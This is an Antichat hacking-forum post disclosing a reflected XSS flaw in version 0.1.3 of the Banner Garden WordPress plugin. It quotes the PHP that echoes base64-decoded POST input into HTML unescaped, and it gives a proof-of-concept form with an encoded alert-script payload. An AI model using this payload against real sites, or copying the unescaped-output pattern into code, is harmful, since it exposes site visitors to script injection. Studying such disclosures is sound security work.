15.05.2010, 10:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Banner Garden Версия 0.1.3
скачал туто: http://wordpress.org/extend
bg-plugin-ajax.php - в корне плагина.
Пасивная XSS
PHP код:
header('Content-type: text/html; charset=UTF-8');
require_once ("../../../wp-config.php");
load_plugin_textdomain( 'bannergarden', false, dirname( plugin_basename( __FILE__ )).'/localization' );
require_once ("bannergarden.class.php");
if (class_exists('BannerGarden')) {
$bg = new BannerGarden();
}
switch ($_POST["type"]) {
case "pic":
$val_arr = array('picture' => base64_decode($_POST["picture"]),
'link' => base64_decode($_POST["link"]),
'new_window' => $_POST["nw"]);
$frm = $bg->GetBannerAjaxForm('pic',$val_arr);
echo $frm;
break;/*...*/
bannergarden.class.php
PHP код:
/*...*/function GetBannerAjaxForm($type,$values = array()) {
switch ($type) {
/**** Picture ****/
case "pic":
$picture = '';
$link = '';
$nw_checked = '';
if (array_key_exists('picture',$values)) {
$picture = $values['picture'];
}
if (array_key_exists('link',$values)) {
$link = $values['link'];
}
if (array_key_exists('new_window',$values)) {
$new_window = $values['new_window'];
if ($new_window == 1) {
$nw_checked = ' checked="checked"';
}
}
$html = '<div class="bg_label">'.__('URL of picture:','bannergarden').'</div>';
$html .= '<small>'.__('Type an image url, or upload / select and image for the banner.','bannergarden').'</small>';
$html .= '<div class="bg_input"><input type="text" id="adpicture" name="adpicture" value="'.$picture.'" /> <input id="upload_button" type="button" value="'.__('Upload / Select Image','bannergarden').'" /></div>';
$html .= '<div class="bg_label">'.__('Link on click:','bannergarden').'</div>';
$html .= '<small>'.__('Enter a URL where we redirect the user. Use full URL start with "http://" or "https://"','bannergarden').'</small>';
$html .= '<div class="bg_input"><input type="text" id="adlink" name="adlink" value="'.$link.'" /></div>';
$html .= '<div class="bg_label">'.__('Open in new window?','bannergarden').'</div>';
$html .= '<small>'.__('Check this box if you want the link to open in a new window.','bannergarden').'</small>';
$html .= '<div class="bg_input"><input type="checkbox" name="adnewwindow" value="1"'.$nw_checked.' /></div>';
break;/*...*/
Результат:
<form action="http://wordpress/wp-content/plugins/banner-garden/bg-plugin-ajax.php" method=post>
<input type=hidden name=link value="Ij48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD48YnI =">
<input type=hidden name=type value=pic>
<input type=submit>
</form> |
|
|